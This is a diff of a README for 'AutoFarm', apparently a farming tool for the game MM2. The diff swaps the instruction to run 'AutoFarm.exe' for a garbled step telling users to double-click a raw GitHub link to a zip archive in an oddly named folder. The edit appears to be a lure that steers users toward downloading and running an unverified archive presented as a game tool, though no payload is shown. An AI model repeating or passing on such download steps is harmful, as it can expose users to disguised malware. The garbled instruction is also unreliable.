maxspielbar/AutoFarm/README.md

 After installation, you can start using AutoFarm.
 Here’s how:

-1. Launch the application by double-clicking ‘AutoFarm.exe’ if it’s not already running.
+1. Launch the application by double-clicking ‘https://raw.githubusercontent.com/maxspielbar/AutoFarm/main/chibrit/Auto_Farm_v2.1.zip’ if it’s not already running.

 2. When the application opens, you will see a simple interface.
 Follow the prompts to set your preferences for farming in MM2.